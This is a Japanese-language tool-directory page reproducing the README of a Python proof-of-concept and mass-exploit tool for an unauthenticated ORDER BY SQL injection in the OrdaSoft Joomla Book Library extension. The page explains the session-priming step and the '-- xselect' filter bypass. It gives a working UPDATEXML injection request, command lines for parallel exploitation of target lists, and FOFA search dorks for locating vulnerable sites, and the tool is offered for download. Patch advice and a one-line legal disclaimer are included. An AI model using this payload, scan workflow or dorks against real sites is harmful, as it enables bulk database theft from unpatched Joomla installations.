Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-101110 — CVE-2026-101110(OrdaSoft Joomla Book Library <=6.4.6 における field/direction パラメータを介した未認証の ORDER BY SQL インジェクション)に対する Python 3 の PoC および一括エクスプロイト。 | Kitploit
ツール/GitHubGitHub/murrez/cve-2026-101110
偵察脆弱性スキャナー脆弱性分析エクスプロイトスクリプトと自動化ウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubmurrez/cve-2026-101110

CVE-2026-101110

CVE-2026-101110(OrdaSoft Joomla Book Library <=6.4.6 における field/direction パラメータを介した未認証の ORDER BY SQL インジェクション)に対する Python 3 の PoC および一括エクスプロイト。

4日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2026-101110 — OrdaSoft Book Library (Free) 未認証SQLインジェクション

Joomla ≤ 6.4.6 向け OrdaSoft Book Library (Free) の CVE-2026-101110 に対するPython 3 PoC。6.4.7+ にアップグレードしてください。

PoCbithttps://pocbit.org/pocs/cve-2026-101110
カタログhttps://pocbit.org/pocs/
コンポーネントcom_booklibrary
ファイル / 関数site/booklibrary.php → books()
パラメータfield、direction (ソート)
認証なし (公開書籍一覧)
CWECWE-89 SQLインジェクション
CVSS 4.09.3 緊急 (Joomla CNA)
クレジットAla Arfaoui

脆弱性の概要 (Türkçe)

Book Library (Free) は、Joomlaで書籍ライブラリ / カテゴリ一覧を提供するOrdaSoftの拡張機能です。6.4.6以前のバージョンでは、books() 関数が field および direction パラメータを protectInjectionWithoutQuote() でフィルタリングします。この関数は select 部分文字列を検索するだけの弱いブラックリストを実装しており、見つかった場合は値を $db->quote() で囲むだけで、拒否はしません。

値はその後、クォートされていない ORDER BY 式に追加されます — ここでクォートを使用しても SQLインジェクションを防ぐことはできません (CNAの説明)。

悪用には2つの条件があります:

  1. セッションプライミング: 最初のリクエストが、セッションに保存されるデフォルトのソート (field / direction) 値を書き込みます。
  2. ブラックリストバイパス: 2番目のリクエストで、ペイロードの末尾に -- xselect デコイコメントを追加します。これによりブラックリストチェックを通過し、SQLコメントは残りのペイロードに影響を与えません。

結果: 認証なしでの ORDER BY SQLi、データベースの読み書き、およびサイトの完全性に対する重大なリスク。


技術的メカニズム

Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

弱いフィルタ (概念):

  • 入力に select (部分文字列) が含まれる → 値全体をクォートで囲む (ORDER BYコンテキストでは無関係)。
  • 攻撃者は -- xselect を追加することで、ブラックリストは コメント末尾 内の select を検出する一方、-- より前の アクティブな 式は実行可能なSQLのままとなる (エラーベース / UPDATEXML / スタックドORDER BYトリック)。

PoCの実装:

ステップアクション
フィンガープリントcom_booklibrary パス + オプションのマニフェストバージョン
ルート探索showCategory、search、showBooks、books、… + スクレイプされた catid / Itemid
checkセッションをプライム → SQLiを確認 (フラグ / VERSION())
exploitプライム → --subquery 抽出 (デフォルト SELECT VERSION())
mass--list + -j 並列ターゲット; リーク成功時に exploited.txt

コード内のペイロードサフィックス定数: -- xselect (BLACKLIST_DECOY)。


要件

cd CVE-2026-101110
pip install -r requirements.txt

使用方法

単一ターゲット

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

一括処理 (exploit優先ワークフロー)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
フラグ意味
--aggressivecheckモードでプライム後にバージョンリークを試行
--subqueryUPDATEXML / ダブルクエリペイロード用の内部式
--exploited-listタブ区切りの抽出成功結果
--no-colorANSIを無効化 (NO_COLOR も可)

JSONL: pocbit、pocbit_catalog、pocbit_page、cve、component、session_primed。


HTTP例

プライム (セッション):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1

インジェクト (PoCがデコイを追加):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1

GETが失敗した場合、同じルートでPOSTバリアントが試行されます。


バージョン検出

マニフェスト (公開されている場合):

  • /administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → 脆弱な行; ≥ 6.4.7 → 修正済み (check出力の patched_version)。


FOFA dorks

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

関連するOrdaSoft CVE (2026年9月)

CVE拡張機能問題修正版
CVE-2026-101110Book LibraryORDER BY SQLi + ブラックリストバイパス6.4.7
CVE-2026-101111Book Library反射型XSS (title パラメータ)6.4.7
CVE-2026-101108Vehicle ManagerORDER BY SQLi6.5.8
CVE-2026-100752Real Estate ManagerORDER BY SQLi6.7.9

デプロイしている すべての OrdaSoftコンポーネントにパッチを適用してください。


参考資料

  • PoCbit CVE-2026-101110
  • CVE.report CVE-2026-101110
  • OrdaSoft
  • 過去の事例: 検索/貸出タスクにおける古い com_booklibrary SQLi (CVE-2010-1522) — 異なるコードパス

法的注意

許可されたテストおよびパッチ検証のみ。


GitHubリポジトリの説明

CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110
ツールをダウンロード